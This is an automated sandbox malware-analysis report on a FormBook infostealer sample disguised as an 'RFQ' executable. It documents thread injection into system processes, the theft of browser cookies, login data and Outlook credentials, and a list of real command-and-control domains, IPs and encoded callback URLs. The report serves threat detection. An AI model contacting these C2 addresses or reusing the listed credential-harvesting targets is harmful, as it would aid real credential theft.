            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\xcopy.exeThread register set: target process: 8000Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 277A008Jump to behavior
            Source: C:\Users\user\Desktop\RFQ 3100185 MAHAD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe"Jump to behavior
            Source: C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: pQIuyzclQg.exe, 00000003.00000002.4152573379.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000000.1883181231.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4152861504.00000000010F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: pQIuyzclQg.exe, 00000003.00000002.4152573379.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000000.1883181231.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4152861504.00000000010F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: pQIuyzclQg.exe, 00000003.00000002.4152573379.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000000.1883181231.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4152861504.00000000010F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: pQIuyzclQg.exe, 00000003.00000002.4152573379.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000003.00000000.1883181231.00000000013F0000.00000002.00000001.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4152861504.00000000010F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: RFQ 3100185 MAHAD.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.4153059351.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4154874640.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152996969.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1959351183.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152909168.0000000002A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1960343452.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963116108.0000000007090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4151604059.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000005.00000002.4153059351.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4154874640.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152996969.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1959351183.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4152909168.0000000002A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1960343452.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1963116108.0000000007090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4151604059.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		111
            Security Software Discovery            		Remote Services1
            Email Collection            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		4
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555909 Sample: RFQ 3100185 MAHAD.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 28 www.robotcurut.xyz 2->28 30 robotcurut.xyz 2->30 32 23 other IPs or domains 2->32 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 RFQ 3100185 MAHAD.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 pQIuyzclQg.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 xcopy.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 pQIuyzclQg.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 energyparks.net 3.33.130.190, 49881, 49896, 49912 AMAZONEXPANSIONGB United States 22->34 36 estrela-b.online 162.241.63.77, 49962, 49970, 49981 UNIFIEDLAYER-AS-1US United States 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ 3100185 MAHAD.exe55%ReversingLabsWin32.Trojan.AutoitInject
            RFQ 3100185 MAHAD.exe100%AviraHEUR/AGEN.1321703
            RFQ 3100185 MAHAD.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            estrela-b.online
            		162.241.63.77
            		truefalse
              		unknown
              www.ak711ka10.lat
              		154.23.181.7
              		truefalse
                		high
                www.theawareness.shop
                		172.67.177.220
                		truefalse
                  		high
                  nutrigenfit.online
                  		195.110.124.133
                  		truefalse
                    		unknown
                    robotcurut.xyz
                    		3.33.130.190
                    		truetrue
                      		unknown
                      co2cartridges.net
                      		3.33.130.190
                      		truefalse
                        		unknown
                        www.ila.beauty
                        		13.248.169.48
                        		truefalse
                          		high
                          binacamasala.com
                          		3.33.130.190
                          		truefalse
                            		unknown
                            www.meanttobebroken.org
                            		141.193.213.11
                            		truefalse
                              		high
                              mjmegartravel.online
                              		76.223.67.189
                              		truefalse
                                		unknown
                                www.hopeisa.live
                                		13.248.169.48
                                		truefalse
                                  		unknown
                                  www.mireela.pro
                                  		69.57.163.227
                                  		truefalse
                                    		high
                                    ghs.googlehosted.com
                                    		142.250.185.211
                                    		truefalse
                                      		high
                                      micrhyms.info
                                      		3.33.130.190
                                      		truefalse
                                        		unknown
                                        energyparks.net
                                        		3.33.130.190
                                        		truefalse
                                          		high
                                          www.micrhyms.info
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.mjmegartravel.online
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.energyparks.net
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.shintow.net
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.binacamasala.com
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.jllllbx.top
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      www.co2cartridges.net
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.estrela-b.online
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.robotcurut.xyz
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.nutrigenfit.online
                                                            		unknown
                                                            		unknownfalse
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.hopeisa.live/v0jl/false
                                                                		unknown
                                                                http://www.energyparks.net/24sh/false
                                                                  		unknown
                                                                  http://www.shintow.net/ow7i/false
                                                                    		high
                                                                    http://www.robotcurut.xyz/37zt/false
                                                                      		unknown
                                                                      http://www.energyparks.net/24sh/?n8C0=M41UUGwRPTDcYYp4CDyQdWj1cPQbgBu2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCR3SUR9gGKPzciSeMUMSO5HA9VQ9I5Ku3b7ko=&vva=cTUXfXqHQ4cd-Hh0false
                                                                        		unknown
                                                                        http://www.theawareness.shop/df5c/false
                                                                          		unknown
                                                                          http://www.ak711ka10.lat/o5z9/false
                                                                            		unknown
                                                                            http://www.meanttobebroken.org/zdt7/false
                                                                              		high
                                                                              http://www.mireela.pro/mdol/?vva=cTUXfXqHQ4cd-Hh0&n8C0=IBR/N437Xoj/lvQ896z8ECWd+LZ6gyFvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLjGotBwfrg89x7LGhzGK2QOZbkPmJ4kDXUDQ=false
                                                                                		unknown
                                                                                http://www.nutrigenfit.online/2vhi/false
                                                                                  		unknown
                                                                                  http://www.mireela.pro/mdol/false
                                                                                    		high
                                                                                    http://www.mjmegartravel.online/t2sm/false
                                                                                      		unknown
                                                                                      http://www.mjmegartravel.online/t2sm/?vva=cTUXfXqHQ4cd-Hh0&n8C0=94IeUqPLX3ZZBpOCZpi27HAmsI+C+yvCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQHI8YLgsovf7r6trIliqKrlGHqlH/IzIJ3iw=false
                                                                                        		unknown
                                                                                        http://www.estrela-b.online/62tt/false
                                                                                          		high
                                                                                          http://www.co2cartridges.net/clyj/false
                                                                                            		unknown
                                                                                            http://www.binacamasala.com/v22a/false
                                                                                              		unknown
                                                                                              http://www.theawareness.shop/df5c/?vva=cTUXfXqHQ4cd-Hh0&n8C0=iTGQ2f3/8wLaRYQM7RYk7LBI2CmVUG8/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUtE7HJkZ3OwJdQgVkFyZkHOTqemIeuqLMyHg=false
                                                                                                		unknown
                                                                                                http://www.nutrigenfit.online/2vhi/?n8C0=p2GYxSiN0s6gm9KFXJAq4e6x0wIcQGHvIu1Z7lHSXEw8LLsTZRCMFJnl6mHAS53RhcMtrCoh89iRZIjWsbRt6wLU8XSetM7dmQ1c462L7iOcXWx8c3Lg+VA=&vva=cTUXfXqHQ4cd-Hh0false
                                                                                                  		unknown
                                                                                                  http://www.micrhyms.info/uao9/?n8C0=gsMVmNPJ8N9SSsJigThKyHE8l/ZIDUN0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAQ/tfwzfeb+QiDBGBZgrMbvLdS9fMPgCGa9I=&vva=cTUXfXqHQ4cd-Hh0false
                                                                                                    		unknown
                                                                                                    http://www.robotcurut.xyz/37zt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=l6jU1h09iQqjeSwPKYuz1pBb0o/w06lG68U0kV9W0wdPoyedT2IMzaad+ev/QDzf4MPOn9Ve63r/J03J+pi+jATvmQ+eVJsL4Kp9LpF4hq/1uKcTc59FKYc=false
                                                                                                      		unknown
                                                                                                      http://www.ila.beauty/qq33/?n8C0=i6Dk+UJVjxglEXs3yzkq0WHG0TlItVmV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnnUFlXdFi4jtVVDEc70mVXkLEkzZ46s+tlcE=&vva=cTUXfXqHQ4cd-Hh0false
                                                                                                        		unknown
                                                                                                        http://www.meanttobebroken.org/zdt7/?n8C0=OdyTsfpKOp+FbfSCrXq4B4jl9EVFsGvs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjApV45c11yxg1NrPYKxfgySb4ZloyON4h3X90=&vva=cTUXfXqHQ4cd-Hh0false
                                                                                                          		unknown
                                                                                                          http://www.co2cartridges.net/clyj/?vva=cTUXfXqHQ4cd-Hh0&n8C0=67OLQ/itOzy1KnXwmhg86ePiFTdHKMCP1Q+a3Yqjn3tA475bPQfRHEiawc6HFAwne4/7/Qcre8rqVQWkFmsoAaxQL8wqiLfDevouvJkPhUImbqP6UxWa6D8=false
                                                                                                            		unknown
                                                                                                            http://www.shintow.net/ow7i/?n8C0=D6NwXqVIZVbqudPYhEefTgY6OVxwomDj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GHI6X7o+Jv/ajj5xRJEPvwXTFBId4ErrvEIs=&vva=cTUXfXqHQ4cd-Hh0false
                                                                                                              		unknown
                                                                                                              http://www.micrhyms.info/uao9/false
                                                                                                                		high
                                                                                                                http://www.ak711ka10.lat/o5z9/?n8C0=z11/8LNw/ilOmRo6t1owndJPGXSfZ5m9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwcvPKLBygcSenq44QTqtbBz+XibjMqnFeT20=&vva=cTUXfXqHQ4cd-Hh0false
                                                                                                                  		unknown

                                                                                                                  URLs from Memory and Binaries

                                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                  https://duckduckgo.com/chrome_newtabxcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://duckduckgo.com/ac/?q=xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://meanttobebroken.org/zdt7/?n8C0=OdyTsfpKOpxcopy.exe, 00000005.00000002.4153994919.0000000004B7E000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.00000000036FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://www.shintow.net/ow7i/?n8C0=D6NwXqVIZVbqudPYhEefTgY6OVxwomDj7EaXwER037qfX6kPuWmDYfQvQA/Zexcopy.exe, 00000005.00000002.4153994919.0000000004536000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.00000000030B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.ecosia.org/newtab/xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://estrela-b.online/62tt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=2eR3StT9zNfU5ywXH53OhrDvihvJYCZlVhDhLCkeExcopy.exe, 00000005.00000002.4153994919.00000000049EC000.00000004.10000000.00040000.00000000.sdmp, pQIuyzclQg.exe, 00000007.00000002.4153187157.000000000356C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://ac.ecosia.org/autocomplete?q=xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.robotcurut.xyzpQIuyzclQg.exe, 00000007.00000002.4154874640.0000000004FC9000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xcopy.exe, 00000005.00000002.4155874511.0000000008268000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          154.23.181.7
                                                                                                                                          		www.ak711ka10.latUnited States
                                                                                                                                          		174COGENT-174USfalse
                                                                                                                                          141.193.213.11
                                                                                                                                          		www.meanttobebroken.orgUnited States
                                                                                                                                          		396845DV-PRIMARY-ASN1USfalse
                                                                                                                                          13.248.169.48
                                                                                                                                          		www.ila.beautyUnited States
                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                          195.110.124.133
                                                                                                                                          		nutrigenfit.onlineItaly
                                                                                                                                          		39729REGISTER-ASITfalse
                                                                                                                                          69.57.163.227
                                                                                                                                          		www.mireela.proUnited States
                                                                                                                                          		25653FORTRESSITXUSfalse
                                                                                                                                          76.223.67.189
                                                                                                                                          		mjmegartravel.onlineUnited States
                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                          162.241.63.77
                                                                                                                                          		estrela-b.onlineUnited States
                                                                                                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                          142.250.185.211
                                                                                                                                          		ghs.googlehosted.comUnited States
                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                          172.67.177.220
                                                                                                                                          		www.theawareness.shopUnited States
                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                          3.33.130.190
                                                                                                                                          		robotcurut.xyzUnited States
                                                                                                                                          		8987AMAZONEXPANSIONGBtrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1555909
                                                                                                                                          Start date and time:2024-11-14 16:26:29 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 7m 8s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                          Technologies:
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:RFQ 3100185 MAHAD.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/5@16/10
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • VT rate limit hit for: RFQ 3100185 MAHAD.exe

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          10:28:25API Interceptor12626442x Sleep call for process: xcopy.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          154.23.181.7RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          OREN Engine Stores Requisition 4th quarter OREN-ES-2024-010 & OREN-ES-2024-011.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • www.ak711ka10.lat/o5z9/
                                                                                                                                          141.193.213.11RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.meanttobebroken.org/zdt7/
                                                                                                                                          IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.meanttobebroken.org/9g6s/
                                                                                                                                          yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                          • www.nelipak.nl/
                                                                                                                                          quotation RFQ no 123609.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                          • www.meanttobebroken.org/zdt7/
                                                                                                                                          Due Payment Invoice PISS2024993.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.meanttobebroken.org/zdt7/
                                                                                                                                          http://hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • hdelm7ye84n38d9lvch0ev4c0.js.wpuserpowered.com/favicon.ico
                                                                                                                                          http://www.aggielandhotel.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • www.aggielandhotel.com/
                                                                                                                                          http://www.trayak.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • www.trayak.com/
                                                                                                                                          http://tacinc.orgGet hashmaliciousUnknownBrowse
                                                                                                                                          • tacinc.org/
                                                                                                                                          http://howardstallings.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • www.howardstallings.com/

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          www.theawareness.shopRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.177.220
